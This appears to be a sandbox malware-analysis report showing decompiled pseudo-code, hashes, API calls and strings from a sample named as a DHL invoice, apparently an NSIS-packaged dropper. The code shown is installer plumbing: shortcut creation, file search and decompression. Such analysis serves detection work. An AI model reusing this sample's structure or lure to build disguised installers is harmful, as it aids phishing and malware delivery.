Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: Char$Next$ItemText$PrevWindow
String ID: A$C:\Users\user\AppData\Local\Temp\mnstring$Call$Preblesses Setup: Installing$hB$hB$hB$user32::EnumWindows(i r1 ,i 0)
API String ID: 4089110348-3451007644
Opcode ID: 67f0241dfe840fb746c4c22d524f7960e15f62eb2687287e958e8c1ad4191570
Instruction ID: 78a62133d8830c36d5793369ed94498114b99b2b12e517e73a25645684f3fa2c
Opcode Fuzzy Hash: 67f0241dfe840fb746c4c22d524f7960e15f62eb2687287e958e8c1ad4191570
Instruction Fuzzy Hash: BD91BFB1704311ABD720AF658C81B6B76A8AF94744F41483EFB42B62D1D77CD9018BAE

Uniqueness

Uniqueness Score: -1.00%

Function 0040234F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134
comCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040234F(void* _a4, signed int _a8, signed int _a12, char _a16, signed int _a36, signed int _a44, intOrPtr _a48, intOrPtr _a60, intOrPtr _a76) {
				char _v0;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v24;
				void* _v28;
				intOrPtr* _v32;
				void* _v36;
				intOrPtr* _v40;
				void* _v48;
				void* _v56;
				void* _v64;
				void* _v68;
				signed int _t46;
				unsigned int _t49;
				intOrPtr* _t56;
				intOrPtr* _t58;
				intOrPtr* _t60;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				unsigned int _t80;
				unsigned int _t81;
				void* _t98;
				intOrPtr* _t100;
				signed int _t103;
				void* _t108;
				void* _t110;

				_a76 = E0040303E(_t98, 0xfffffff0);
				_a16 = E0040303E(_t98, 0xffffffdf);
				_a60 = E0040303E(_t98, 2);
				_a60 = E0040303E(_t98, 0xffffffcd);
				_a48 = E0040303E(_t98, 0x45);
				_t46 = _a36;
				_a12 = _t46 & 0x00000fff;
				_a8 = _t46 & 0x00008000;
				_t103 = _t46 >> 0x0000000c & 0x00000007;
				_a44 = _t46 >> 0x10;
				if(E00406E03(_t42) == 0) {
					E0040303E(_t98, 0x21);
				}
				_t49 =  &_a16;
				__imp__CoCreateInstance(0x409adc, _t108, 1, 0x409abc, _t49);
				_t80 = _t49;
				if(_t80 >= 0) {
					_t56 =  *((intOrPtr*)(_t110 + 0x10));
					_t80 =  *((intOrPtr*)( *_t56))(_t56, 0x409acc,  &_v0);
					if(_t80 >= 0) {
						_t60 =  *((intOrPtr*)(_t110 + 0x10));
						_t80 =  *((intOrPtr*)( *_t60 + 0x50))(_t60, _v8);
						if(_v12 == _t108) {
							_t76 = _v24;
							 *((intOrPtr*)( *_t76 + 0x24))(_t76, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring\\Cirkusprogrammet\\Lovgivningers\\Wolfgang");
						}
						if(_t103 != 0) {
							_t74 = _v24;
							 *((intOrPtr*)( *_t74 + 0x3c))(_t74, _t103);
						}
						_t62 = _v24;
						 *((intOrPtr*)( *_t62 + 0x34))(_t62,  *((intOrPtr*)(_t110 + 0x40)));
						_t100 =  *((intOrPtr*)(_t110 + 0x4c));
						if( *_t100 != _t108) {
							_t72 = _v32;
							 *((intOrPtr*)( *_t72 + 0x44))(_t72, _t100,  *((intOrPtr*)(_t110 + 0x20)));
						}
						_t64 = _v32;
						 *((intOrPtr*)( *_t64 + 0x2c))(_t64,  *((intOrPtr*)(_t110 + 0x48)));
						_t66 = _v40;
						 *((intOrPtr*)( *_t66 + 0x1c))(_t66, _a12);
						if(_t80 >= 0) {
							_t70 =  *((intOrPtr*)(_t110 + 0x14));
							_t80 =  *((intOrPtr*)( *_t70 + 0x18))(_t70, _a16, 1);
						}
						_t68 =  *((intOrPtr*)(_t110 + 0x14));
						 *((intOrPtr*)( *_t68 + 8))(_t68);
					}
					_t58 =  *((intOrPtr*)(_t110 + 0x10));
					 *((intOrPtr*)( *_t58 + 8))(_t58);
				}
				E00405D3A((_t80 >> 0x0000001f & 0xfffffffc) - 0xc, "C:\Users\Arthur\AppData\Local\Temp\nsh6AA5.tmp\System.dll");
				_t81 = _t80 >> 0x1f;
				 *0x435ac8 =  *0x435ac8 + _t81;
				return 0;
			}

0x00402358
0x00402365
0x00402370
0x0040237b
0x00402384
0x00402388
0x00402396
0x004023a9
0x004023ad
0x004023b0
0x004023bb
0x004023bf
0x004023bf
0x004023c4
0x004023d8
0x004023de
0x004023e2
0x004023e8
0x004023fb
0x004023ff
0x00402405
0x00402413
0x00402419
0x0040241b
0x00402427
0x00402427
0x0040242c
0x0040242e
0x00402436
0x00402436
0x00402439
0x00402444
0x00402447
0x0040244e
0x00402450
0x0040245c
0x0040245c
0x0040245f
0x0040246a
0x0040246d
0x00402478
0x0040247d
0x0040247f
0x0040248e
0x0040248e
0x00402490
0x00402497
0x00402497
0x0040249a
0x004024a1
0x004024a1
0x004024b5
0x004024ba
0x00402ea5
0x00402eb7

APIs

CoCreateInstance.OLE32(00409ADC,?,00000001,00409ABC,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004023D8

Strings

C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll, xrefs: 004024AC
C:\Users\user\AppData\Local\Temp\mnstring\Cirkusprogrammet\Lovgivningers\Wolfgang, xrefs: 0040241F

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Temp\mnstring\Cirkusprogrammet\Lovgivningers\Wolfgang$C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll
API String ID: 542301482-2621777792
Opcode ID: fa71e6c1b5bc3ea9f988551a356e3e4450701bd7444ffcb1ce1b00db588fc18d
Instruction ID: 400f91c807c924ebcba0c57f4558c7b9259f909ea30478445bd8bb36a2d5bedd
Opcode Fuzzy Hash: fa71e6c1b5bc3ea9f988551a356e3e4450701bd7444ffcb1ce1b00db588fc18d
Instruction Fuzzy Hash: 5E414C72604341AFC700DFA5C888A1BBBE9FF89315F14092EF655DB291DB79D805CB16

Uniqueness

Uniqueness Score: -1.00%

Function 00402B75 Relevance: 1.5, APIs: 1, Instructions: 19
fileCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00402B75(void* __edi, void* __esi, struct _WIN32_FIND_DATAW _a136, void* _a172) {
				void* _v4;
				intOrPtr _t10;
				void* _t14;
				void* _t20;

				if(FindFirstFileW(E0040303E(_t14, 2),  &_a136) != 0xffffffff) {
					E0040661F(__esi, _t5);
					_push(_t20 + 0xb8);
					_push(__edi);
					E00406B1A();
					_t10 =  *((intOrPtr*)(_t20 + 0x10));
				} else {
					 *__esi = __ax;
					 *__edi = __ax;
					_t10 = 1;
				}
				 *0x435ac8 =  *0x435ac8 + _t10;
				return 0;
			}

0x00402b8e
0x00402b9c
0x00402b6e
0x00402b6f
0x00401d46
0x00402ea1
0x00402b90
0x00402b92
0x00402857
0x0040170b
0x0040170b
0x00402ea5
0x00402eb7

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402B85

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 418b3747aa208848d22216286404bd5f33ecbcbc15520eeee9413542a938acf4
Instruction ID: 4ed41b4626080909459e48417ffb7120e43efe1e52fe46e4786edeb33a661726
Opcode Fuzzy Hash: 418b3747aa208848d22216286404bd5f33ecbcbc15520eeee9413542a938acf4
Instruction Fuzzy Hash: ADD0EC61414150A9D2606F71894DABA73ADAF45314F204A3EF156E50D1EAB85501973B

Uniqueness

Uniqueness Score: -1.00%

Function 004075FE Relevance: .4, Instructions: 410
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E004075FE(signed int* __ebx, signed int __edi, signed int __esi) {
				signed int _t447;
				signed int _t450;
				void* _t460;
				signed int _t461;
				signed int _t466;
				signed int _t467;
				void* _t469;
				signed int _t470;
				signed int _t475;
				signed int _t476;
				unsigned int _t505;
				void* _t513;
				signed int _t526;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t539;
				signed int _t544;
				signed int _t545;
				void* _t546;
				signed int _t547;
				unsigned int _t555;
				signed int _t559;
				signed int* _t567;
				signed int _t572;
				signed int _t574;
				signed int _t576;
				signed int _t595;
				void* _t602;
				signed int _t604;
				signed int _t607;
				signed char _t608;
				signed char* _t609;
				signed int _t611;
				signed int _t614;
				signed int _t615;
				void* _t616;
				unsigned int _t619;
				unsigned int _t625;
				signed int* _t629;
				signed char _t634;
				signed char _t635;
				signed char** _t637;
				void* _t638;
				signed int _t639;
				unsigned int _t644;
				signed int _t646;
				signed int _t647;
				unsigned int _t651;
				signed int _t652;
				void* _t657;

				L0:
				while(1) {
					L0:
					_t652 = __esi;
					_t647 = __edi;
					_t567 = __ebx;
					_t637 =  *(_t657 + 0x48);
					L56:
					while(_t652 < 0xe) {
						if(_t447 == 0) {
							L189:
							 *(_t657 + 0x1c) =  *(_t657 + 0x1c) & 0x00000000;
							_t567[0x147] = _t647;
							_t567[0x146] = _t652;
							_t637[1] = _t637[1] & 0x00000000;
							L196:
							 *_t637 =  *(_t657 + 0x14);
							_t567[0x26ea] =  *(_t657 + 0x18);
							L00407FBE(_t637);
							_t450 =  *(_t657 + 0x1c);
							L197:
							return _t450;
						}
						L55:
						 *(_t657 + 0x10) = _t447 - 1;
						_t647 = _t647 | ( *( *(_t657 + 0x14)) & 0x000000ff) << _t652;
						 *(_t657 + 0x14) =  &(( *(_t657 + 0x14))[1]);
						_t447 =  *(_t657 + 0x10);
						_t652 = _t652 + 8;
					}
					_t572 = _t647 & 0x00003fff;
					_t567[1] = _t572;
					if((_t572 & 0x0000001f) > 0x1d || (_t572 & 0x000003e0) > 0x3a0) {
						L186:
						_t567[0x146] = _t652;
						 *_t567 = 0x11;
						_t567[0x147] = _t647;
						_t637[1] =  *(_t657 + 0x10);
						goto L196;
					} else {
						L59:
						_t652 = _t652 - 0xe;
						_t647 = _t647 >> 0xe;
						_t567[2] = _t567[2] & 0x00000000;
						 *(_t657 + 0x20) = _t652;
						 *_t567 = 0xc;
						while(1) {
							L60:
							_t574 = _t567[2];
							_t637 =  *(_t657 + 0x48);
							L65:
							while(_t574 < (_t567[1] >> 0xa) + 4) {
								while(1) {
									L63:
									_t460 = 3;
									if(_t652 >= _t460) {
										break;
									}
									L61:
									_t461 =  *(_t657 + 0x10);
									if(_t461 == 0) {
										goto L189;
									}
									L62:
									 *(_t657 + 0x10) = _t461 - 1;
									_t647 = _t647 | ( *( *(_t657 + 0x14)) & 0x000000ff) << _t652;
									 *(_t657 + 0x14) =  &(( *(_t657 + 0x14))[1]);
									_t652 = _t652 + 8;
								}
								L64:
								_t466 = 7;
								_t576 = _t647;
								_t647 = _t647 >> 3;
								_t467 = _t567[2];
								_t96 = _t467 + 0x4099b0; // 0x121110
								 *(_t567 + 0xc +  *_t96 * 4) = _t576 & _t466;
								_t574 = _t567[2] + 1;
								_t469 = 3;
								_t652 = _t652 - _t469;
								_t567[2] = _t574;
								 *(_t657 + 0x20) = _t652;
							}
							_t638 = 0x13;
							if(_t574 >= _t638) {
								L68:
								_t470 = 7;
								 *(_t657 + 0x30) =  *(_t657 + 0x30) & 0x00000000;
								_t567[0x143] = _t470;
								_t475 = E00406EA8( &(_t567[3]), _t638, _t638, 0, 0,  &(_t567[0x144]),  &(_t567[0x143]),  &(_t567[0x148]), _t657 + 0x30);
								if(_t475 != 0 || _t567[0x143] == _t475) {
									L73:
									 *_t567 = 0x11;
									goto L22;
								} else {
									L70:
									_t567[2] = _t567[2] & _t475;
									 *_t567 = 0xd;
									L71:
									_t505 = _t567[1];
									_t637 =  *(_t657 + 0x48);
									 *(_t657 + 0x24) = _t505;
									if(_t567[2] >= (_t505 & 0x0000001f) + 0x102 + (_t505 >> 0x00000005 & 0x0000001f)) {
										L95:
										_t595 =  *(_t657 + 0x24);
										_t567[0x144] = _t567[0x144] & 0x00000000;
										 *(_t657 + 0x2c) =  *(_t657 + 0x2c) & 0x00000000;
										 *(_t657 + 0x30) = (_t595 & 0x0000001f) + 0x101;
										 *(_t657 + 0x2c) = 9;
										 *(_t657 + 0x28) = (_t595 >> 0x00000005 & 0x0000001f) + 1;
										 *(_t657 + 0x28) = 6;
										_t513 = E00406EA8( &(_t567[3]), (_t595 & 0x0000001f) + 0x101, 0x101, 0x4099c4, 0x409a04, _t657 + 0x48, _t657 + 0x30,  &(_t567[0x148]), _t657 + 0x2c);
										_t602 = 0xffffffff;
										_t476 =  ==  ? _t602 : _t513;
										if(_t476 != 0) {
											L187:
											_t637 =  *(_t657 + 0x48);
											L188:
											_t567[0x146] = _t652;
											_t567[0x147] = _t647;
											 *_t567 = 0x11;
											_t637[1] =  *(_t657 + 0x10);
											L195:
											 *(_t657 + 0x1c) = _t476 | 0xffffffff;
											goto L196;
										}
										L96:
										_t476 = E00406EA8( &(_t567[ *((intOrPtr*)(_t657 + 0x50)) + 3]),  *((intOrPtr*)(_t657 + 0x34)), 0, 0x409a44, 0x409a80, _t657 + 0x4c, _t657 + 0x28,  &(_t567[0x148]), _t657 + 0x2c);
										if(_t476 != 0) {
											goto L187;
										}
										L97:
										_t476 =  *(_t657 + 0x20);
										if(_t476 != 0 ||  *(_t657 + 0x30) <= 0x101) {
											L99:
											 *_t567 =  *_t567 & 0x00000000;
											_t567[4] = _t476;
											_t567[5] =  *(_t657 + 0x3c);
											_t567[4] =  *(_t657 + 0x28);
											_t567[6] =  *(_t657 + 0x40);
											L100:
											_t567[3] = _t567[4] & 0x000000ff;
											_t567[2] = _t567[5];
											_t526 =  *(_t657 + 0x10);
											 *_t567 = 1;
											L101:
											_t637 =  *(_t657 + 0x48);
											while(1) {
												L104:
												_t604 = _t567[3];
												if(_t652 >= _t604) {
													break;
												}
												L102:
												if(_t526 == 0) {
													goto L189;
												}
												L103:
												 *(_t657 + 0x10) = _t526 - 1;
												_t647 = _t647 | ( *( *(_t657 + 0x14)) & 0x000000ff) << _t652;
												 *(_t657 + 0x14) =  &(( *(_t657 + 0x14))[1]);
												_t526 =  *(_t657 + 0x10);
												_t652 = _t652 + 8;
											}
											L105:
											_t531 = _t567[2];
											_t607 =  *(0x40b0c0 + _t604 * 2) & 0x0000ffff & _t647;
											_t644 = _t531 + _t607 * 4;
											_t608 =  *(_t531 + 1 + _t607 * 4) & 0x000000ff;
											_t652 = _t652 - _t608;
											_t647 = _t647 >> _t608;
											_t609 = _t644;
											 *(_t657 + 0x30) = _t644;
											 *(_t657 + 0x20) = _t652;
											_t532 =  *_t609 & 0x000000ff;
											if(_t532 != 0) {
												L107:
												if((_t532 & 0x00000010) == 0) {
													L109:
													if((_t532 & 0x00000040) != 0) {
														L111:
														if((_t532 & 0x00000020) == 0) {
															L193:
															_t476 =  *(_t657 + 0x10);
															L194:
															_t637 =  *(_t657 + 0x48);
															 *_t567 = 0x11;
															_t567[0x147] = _t647;
															_t567[0x146] = _t652;
															_t637[1] = _t476;
															goto L195;
														}
														L112:
														_t533 = 7;
														 *_t567 = _t533;
														L22:
														L177:
														_t476 =  *(_t657 + 0x10);
														L178:
														_t639 = 0xf;
														L179:
														while( *_t567 <= _t639) {
															switch( *((intOrPtr*)( *_t567 * 4 +  &M00407F7E))) {
																case 0:
																	goto L100;
																case 1:
																	goto L101;
																case 2:
																	L113:
																	__edx =  *(__esp + 0x48);
																	while(1) {
																		L116:
																		__ecx = __ebx[2];
																		__eflags = __esi - __ecx;
																		if(__esi >= __ecx) {
																			break;
																		}
																		L114:
																		__eflags = __eax;
																		if(__eax == 0) {
																			goto L189;
																		}
																		L115:
																		__eax = __eax - 1;
																		__ecx = __esi;
																		 *(__esp + 0x10) = __eax;
																		 *(__esp + 0x14) =  *( *(__esp + 0x14)) & 0x000000ff;
																		__eax = ( *( *(__esp + 0x14)) & 0x000000ff) << __cl;
																		__edi = __edi | ( *( *(__esp + 0x14)) & 0x000000ff) << __cl;
																		 *(__esp + 0x14) =  *(__esp + 0x14) + 1;
																		__eax =  *(__esp + 0x10);
																		__esi = __esi + 8;
																		__eflags = __esi;
																	}
																	L117:
																	__eax =  *(0x40b0c0 + __ecx * 2) & 0x0000ffff;
																	__eax =  *(0x40b0c0 + __ecx * 2) & 0x0000ffff & __edi;
																	__edi = __edi >> __cl;
																	__ebx[1] = __ebx[1] + __eax;
																	__esi = __esi - __ecx;
																	__eflags = __esi;
																	__eax = __ebx[4] & 0x000000ff;
																	__ebx[3] = __ebx[4] & 0x000000ff;
																	__eax = __ebx[6];
																	__ebx[2] = __ebx[6];
																	_push(3);
																	_pop(__eax);
																	 *__ebx = __ebx[6];
																	__eax =  *(__esp + 0x10);
																	goto L118;
																case 3:
																	L118:
																	__edx =  *(__esp + 0x48);
																	while(1) {
																		L121:
																		__ecx = __ebx[3];
																		__eflags = __esi - __ecx;
																		if(__esi >= __ecx) {
																			break;
																		}
																		L119:
																		__eflags = __eax;
																		if(__eax == 0) {
																			goto L189;
																		}
																		L120:
																		__eax = __eax - 1;
																		__ecx = __esi;
																		 *(__esp + 0x10) = __eax;
																		 *(__esp + 0x14) =  *( *(__esp + 0x14)) & 0x000000ff;
																		__eax = ( *( *(__esp + 0x14)) & 0x000000ff) << __cl;
																		__edi = __edi | ( *( *(__esp + 0x14)) & 0x000000ff) << __cl;
																		 *(__esp + 0x14) =  *(__esp + 0x14) + 1;
																		__eax =  *(__esp + 0x10);
																		__esi = __esi + 8;
																		__eflags = __esi;
																	}
																	L122:
																	__ecx =  *(0x40b0c0 + __ecx * 2) & 0x0000ffff;
																	__eax = __ebx[2];
																	__eax = __ebx[2] + __ecx * 4;
																	__ecx =  *(__eax + 1) & 0x000000ff;
																	 *(__esp + 0x30) = __eax;
																	__esi = __esi - ( *(__eax + 1) & 0x000000ff);
																	__eax =  *__eax & 0x000000ff;
																	__edi = __edi >> __cl;
																	 *(__esp + 0x20) = __esi;
																	__eflags = __al & 0x00000010;
																	if((__al & 0x00000010) == 0) {
																		L124:
																		__eflags = __al & 0x00000040;
																		if((__al & 0x00000040) != 0) {
																			goto L193;
																		}
																		L125:
																		__ecx =  *(__esp + 0x30);
																		goto L110;
																	}
																	L123:
																	_push(0xf);
																	_pop(__ecx);
																	__eax = __eax & __ecx;
																	__ecx =  *(__esp + 0x30);
																	__ebx[2] = __eax;
																	__eax =  *(__ecx + 2) & 0x0000ffff;
																	__ebx[3] = __eax;
																	 *__ebx = 4;
																	goto L22;
																case 4:
																	L126:
																	__edx =  *(__esp + 0x48);
																	while(1) {
																		L129:
																		__ecx = __ebx[2];
																		__eflags = __esi - __ecx;
																		if(__esi >= __ecx) {
																			break;
																		}
																		L127:
																		__eflags = __eax;
																		if(__eax == 0) {
																			goto L189;
																		}
																		L128:
																		__eax = __eax - 1;
																		__ecx = __esi;
																		 *(__esp + 0x10) = __eax;
																		 *(__esp + 0x14) =  *( *(__esp + 0x14)) & 0x000000ff;
																		__eax = ( *( *(__esp + 0x14)) & 0x000000ff) << __cl;
																		__edi = __edi | ( *( *(__esp + 0x14)) & 0x000000ff) << __cl;
																		 *(__esp + 0x14) =  *(__esp + 0x14) + 1;
																		__eax =  *(__esp + 0x10);
																		__esi = __esi + 8;
																		__eflags = __esi;
																	}
																	L130:
																	__eax =  *(0x40b0c0 + __ecx * 2) & 0x0000ffff;
																	__eax =  *(0x40b0c0 + __ecx * 2) & 0x0000ffff & __edi;
																	__edi = __edi >> __cl;
																	__ebx[3] = __ebx[3] + __eax;
																	__esi = __esi - __ecx;
																	__eflags = __esi;
																	__ecx =  *(__esp + 0x18);
																	 *(__esp + 0x20) = __esi;
																	 *__ebx = 5;
																	goto L131;
																case 5:
																	L131:
																	__edx =  *(__esp + 0x48);
																	__ecx = __ecx - __ebx;
																	__eax = __ecx - __ebx - 0x1ba0;
																	__eflags = __ecx - __ebx - 0x1ba0 - __ebx[3];
																	if(__ecx - __ebx - 0x1ba0 >= __ebx[3]) {
																		__eax = __ecx;
																		__eax = __ecx - __ebx[3];
																		__eflags = __eax;
																	} else {
																		__ebx[0x26e8] = __ebx[0x26e8] - __ebx[3];
																		__ebx[0x26e8] - __ebx[3] - __ebx = __ebx[0x26e8] - __ebx[3] - __ebx + 0xffffe460;
																		__eax = __ebx[0x26e8] - __ebx[3] - __ebx + 0xffffe460 + __ecx;
																	}
																	__eflags = __ebx[1];
																	 *(__esp + 0x24) = __eax;
																	if(__ebx[1] != 0) {
																		do {
																			L135:
																			__eflags = __ebp;
																			if(__ebp != 0) {
																				goto L151;
																			}
																			L136:
																			__eflags = __ecx - __ebx[0x26e8];
																			if(__ecx != __ebx[0x26e8]) {
																				L142:
																				__ebx[0x26ea] = __ecx;
																				L00407FBE(__edx);
																				__ecx = __ebx[0x26ea];
																				__eax = __ebx[0x26e9];
																				__edx =  *(__esp + 0x48);
																				 *(__esp + 0x18) = __ecx;
																				__eflags = __ecx - __eax;
																				if(__ecx >= __eax) {
																					__eax = __ebx[0x26e8];
																					__ebp = __eax;
																					__ebp = __eax - __ecx;
																					__eflags = __ebp;
																				} else {
																					__ebp = __eax;
																					__eax =  *(__edx + 0x9bb0);
																					__ebp = __ebp - __ecx;
																					__ebp = __ebp - 1;
																				}
																				 *(__esp + 0x30) = __eax;
																				__eflags = __ecx - __eax;
																				if(__ecx == __eax) {
																					__eax =  &(__ebx[0x6e8]);
																					__eflags = __ebx[0x26e9] - __eax;
																					if(__ebx[0x26e9] != __eax) {
																						__ebp = __ebx[0x26e9];
																						__ecx = __eax;
																						 *(__esp + 0x18) = __ecx;
																						__eflags = __eax - __ebp;
																						if(__eax >= __ebp) {
																							__ebp =  *(__esp + 0x30);
																							__ebp =  *(__esp + 0x30) - __eax;
																							__eflags = __ebp;
																						} else {
																							__ebp = __ebp - __eax;
																							__ebp = __ebp - 1;
																						}
																					}
																				}
																				__eflags = __ebp;
																				if(__ebp == 0) {
																					goto L192;
																				} else {
																					goto L151;
																				}
																			}
																			L137:
																			__ebp = __ebx[0x26e9];
																			__eax =  &(__ebx[0x6e8]);
																			__eflags = __ebp - __eax;
																			if(__eflags == 0) {
																				goto L142;
																			}
																			L138:
																			__ecx = __eax;
																			if(__eflags <= 0) {
																				__ebp = __ebx[0x26e8];
																				__ebp = __ebx[0x26e8] - __eax;
																				__eflags = __ebp;
																			} else {
																				__ebp = __ebp - __eax;
																				__ebp = __ebp - 1;
																			}
																			__eflags = __ebp;
																			if(__ebp == 0) {
																				goto L142;
																			}
																			L151:
																			__eax =  *(__esp + 0x24);
																			__al =  *( *(__esp + 0x24));
																			 *__ecx = __al;
																			__ecx = __ecx + 1;
																			__eax =  *(__esp + 0x24);
																			__eax =  *(__esp + 0x24) + 1;
																			 *(__esp + 0x18) = __ecx;
																			__ebp = __ebp - 1;
																			 *(__esp + 0x24) = __eax;
																			__eflags = __eax - __ebx[0x26e8];
																			if(__eax == __ebx[0x26e8]) {
																				__eax =  &(__ebx[0x6e8]);
																				 *(__esp + 0x24) = __eax;
																			}
																			_t356 =  &(__ebx[1]);
																			 *_t356 = __ebx[1] - 1;
																			__eflags =  *_t356;
																		} while ( *_t356 != 0);
																	}
																	goto L154;
																case 6:
																	L155:
																	__edx =  *(__esp + 0x48);
																	__eflags = __ebp;
																	if(__ebp != 0) {
																		L171:
																		__al = __ebx[2];
																		 *__ecx = __al;
																		__ecx = __ecx + 1;
																		 *(__esp + 0x18) = __ecx;
																		__ebp = __ebp - 1;
																		L154:
																		 *__ebx =  *__ebx & 0x00000000;
																		goto L177;
																	}
																	L156:
																	__eflags = __ecx - __ebx[0x26e8];
																	if(__ecx != __ebx[0x26e8]) {
																		L162:
																		__ebx[0x26ea] = __ecx;
																		L00407FBE(__edx);
																		__ecx = __ebx[0x26ea];
																		__eax = __ebx[0x26e9];
																		__edx =  *(__esp + 0x48);
																		 *(__esp + 0x18) = __ecx;
																		__eflags = __ecx - __eax;
																		if(__ecx >= __eax) {
																			__eax = __ebx[0x26e8];
																			__ebp = __eax;
																			__ebp = __eax - __ecx;
																			__eflags = __ebp;
																		} else {
																			__ebp = __eax;
																			__eax =  *(__edx + 0x9bb0);
																			__ebp = __ebp - __ecx;
																			__ebp = __ebp - 1;
																		}
																		 *(__esp + 0x30) = __eax;
																		__eflags = __ecx - __eax;
																		if(__ecx == __eax) {
																			__eax =  &(__ebx[0x6e8]);
																			__eflags = __ebx[0x26e9] - __eax;
																			if(__ebx[0x26e9] != __eax) {
																				__ebp = __ebx[0x26e9];
																				__ecx = __eax;
																				 *(__esp + 0x18) = __ecx;
																				__eflags = __eax - __ebp;
																				if(__eax >= __ebp) {
																					__ebp =  *(__esp + 0x30);
																					__ebp =  *(__esp + 0x30) - __eax;
																					__eflags = __ebp;
																				} else {
																					__ebp = __ebp - __eax;
																					__ebp = __ebp - 1;
																				}
																			}
																		}
																		__eflags = __ebp;
																		if(__ebp == 0) {
																			goto L192;
																		} else {
																			goto L171;
																		}
																	}
																	L157:
																	__ebp = __ebx[0x26e9];
																	__eax =  &(__ebx[0x6e8]);
																	__eflags = __ebp - __eax;
																	if(__eflags == 0) {
																		goto L162;
																	}
																	L158:
																	__ecx = __eax;
																	if(__eflags <= 0) {
																		__ebp = __ebx[0x26e8];
																		__ebp = __ebx[0x26e8] - __eax;
																		__eflags = __ebp;
																	} else {
																		__ebp = __ebp - __eax;
																		__ebp = __ebp - 1;
																	}
																	__eflags = __ebp;
																	if(__ebp != 0) {
																		goto L171;
																	} else {
																		goto L162;
																	}
																case 7:
																	L172:
																	_push(7);
																	_pop(__ebp);
																	__eflags = __esi - __ebp;
																	if(__esi > __ebp) {
																		__esi = __esi - 8;
																		__eax = __eax + 1;
																		_t378 = __esp + 0x14;
																		 *_t378 =  *(__esp + 0x14) - 1;
																		__eflags =  *_t378;
																		 *(__esp + 0x20) = __esi;
																		 *(__esp + 0x10) = __eax;
																	}
																	goto L174;
																case 8:
																	L2:
